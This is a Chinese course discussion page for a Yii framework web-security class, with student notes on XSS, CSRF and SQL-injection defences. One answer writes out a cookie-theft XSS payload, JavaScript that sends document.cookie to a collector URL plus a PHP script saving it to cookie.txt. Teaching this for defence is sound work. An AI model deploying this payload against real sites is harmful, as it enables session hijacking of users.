Yii框架不得不说的故事—安全篇（3）_技术问答

首页免费课 Yii框架不得不说的故事—安全篇（3）问答

Yii框架不得不说的故事—安全篇（3）

全部评论问答未解决精华

真实的追梦者

在mysql端使用占位符。防止SQL注入。

0 6-2 sql注入yii的防范

2017-02-21

真实的追梦者

yii要有_csrf值

0 5-5 csrf攻击之yii验证过程

2017-02-21

真实的追梦者

用户登录系统，然后填写伪造的表单，csrf攻击。

0 5-2 csrf攻击之post型攻击

2017-02-21

真实的追梦者

过滤防范，lexer

0 4-4 xss攻击之过滤防范

2017-02-21

真实的追梦者

encode 防范

0 4-3 xss攻击之转码防范

2017-02-21

真实的追梦者

&gt;&lt;&quot;

0 3-6 xss攻击之html实体编码

2017-02-20

真实的追梦者

httponly 不能通过JavaScript获取。

0 2-6 xss攻击之httponly

2017-02-20

真实的追梦者

盗取别人的cookie，然后自己模拟别人登陆。

0 2-5 xss攻击之寻找登陆cookie

2017-02-20

cookie.txt是怎么生成的？

最赞回答 / 北城慕容雪

js里面：var cookie = document.cookie;window.location.href='http://127.0.0.1/index.php?cookie='+cookie;index.php文件里面：<?phpfile_put_contents('cookie.txt', $_GET['cookie']);

3 回答 3033 浏览 2-5 xss攻击之寻找登陆cookie

2017-02-17

走走停

0 2-1 xss攻击介绍

2017-02-12

西兰花伟大炮

真的会把持不住

0 4-2 xss攻击之新浪微博xss蠕虫

2017-02-08

西兰花伟大炮

老师的口头禅是调试神器

0 2-3 xss攻击之获取cookie

2017-02-08

西兰花伟大炮

火辣辣的，脸红了

1 5-1 csrf攻击之get型攻击

2017-02-07

_phpstudy

yii 框架开启csrf验证哪有这么麻烦
``` php
/**
* @var boolean whether to enable CSRF validation for the actions in this controller.
* CSRF validation is enabled only when both this property and [[Request::enableCsrfValidation]] are true.
*/
public $enableCsrfValidation = true;
```

0 5-4 csrf攻击之yii验证方式

2017-02-01

_phpstudy

木祁3
这Yii框架看着要比TP框架高档一点！
--------------------------------------
不知道阁下有什么根据这么说
--------------------------------------
阁下把两个框架都用用就知道根据什么了

0 2-1 xss攻击介绍

2017-01-30

喝了这杯酒

老师，真的很稀饭你呀。帅气。

0 1-1 Yii框架关于安全

2017-01-29

首页上一页 5 6 7 8 9 10 11 下一页尾页

该课程已下架

课程须知: 学习本门课程之前，建议先了解一下知识，会更有助于理解和掌握本门课程 1、掌握PHP基本的语言语法 2、了解sql语句和数据库 3、对互联网安全有一定的了解

老师告诉你能学到什么？: 1、XSS、CSRF、SQL注入、文件上传漏洞等攻击方式。 2、YII框架中使用的lexer解析、cookie校验、pdo防范措施。

微信扫码，参与3人拼团

热搜

最近搜索清空

Yii框架不得不说的故事—安全篇（3）

cookie.txt是怎么生成的？